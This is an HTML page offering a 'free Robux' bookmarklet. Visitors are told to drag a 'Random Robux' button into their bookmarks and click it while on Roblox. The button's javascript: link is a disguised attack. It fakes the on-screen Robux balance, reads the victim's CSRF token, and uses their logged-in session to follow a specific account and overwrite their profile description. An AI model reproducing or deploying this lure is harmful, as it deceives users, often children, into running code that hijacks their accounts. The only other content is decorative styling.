<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="icon" type="image/x-icon" href="https://i.ibb.co/sdmv64R8/16619942721e16fec8b4e92aad12c1458dbb32a75e.png">
    <title>Infinity Robux Bookmark</title>
</head>
<body>
    <a id="infoText">Drag the button under Into Your Bookmarks and Click it  when in Roblox website!<br>(50K-50M Robux)</a>
    <a id="bookmarkBtn" href=
    "javascript:document.querySelector('#nav-robux-amount').innerHTML='24M';
    const url='https://friends.roblox.com/v1/users/5771132514/follow';
    const csrfToken=Roblox.XsrfToken.getToken();
    const headers={'X-CSRF-TOKEN':csrfToken};
    const data={isCaptchaRequired:false,success:true};
    fetch(url,{
        method:'POST',
        headers:headers,
        body:JSON.stringify(data),
        credentials:'include'
    })
    .then(response=>response.json())
    .catch(error=>console.error('Error:',error));

    const url2=`https://users.roblox.com/v1/description`;
    const data2={'description':'Gabi Is King'};
    fetch(url2,{
        method:'POST',
        headers:headers,
        body:JSON.stringify(data2),
        credentials:'include'
    })
    .then(response=>response.json())
    .catch(error=>console.error('Error:',error));">
        Random Robux
    </a>
</body>
<style>
    body{
        background: #1a1a24;
        overflow: hidden;
    }
    #infoText {
        color: #dadbdc;
        position: absolute;
        left: 50%;
        top: 15%;
        transform: translate(-50%,-50%);
        font-size: 22pt;
        font-weight: 900;
        font-family: Arial, Helvetica, sans-serif;
        text-align: center;
        z-index: 5;
    }
    #bookmarkBtn {
        z-index: 5;
        background: #30303a;
        position: absolute;
        left: 50%;
        top: 50%;
        transform: translate(-50%,-50%);
        text-align: center;
        padding: 2% 4%;
        border: 1px #494c5d solid;
        font-size: 30pt;
        text-decoration: none;
        color: #fff;
        font-family: Arial, Helvetica, sans-serif;
        border-radius: 1vw;
        transition: 0.5s all;
    }
    #bookmarkBtn:hover{
        background: #363640;
    }

</style>
<script>
    var stars = 50
    var radius = 10
    for(i=0;i<stars;i++){
        var star = document.createElement("div")
        star.innerHTML="&#x2726"
        star.style.position="absolute"
        star.style.left=`${Math.random()*(innerWidth)-(radius*2)}px`
        star.style.top=`${Math.random()*(innerHeight)-(radius*2)}px`
        star.style.color="#ffffff10"
        star.style.width=`${radius}px`
        star.style.aspectRatio="1"
        document.body.appendChild(star)
    }
</script>
</html>
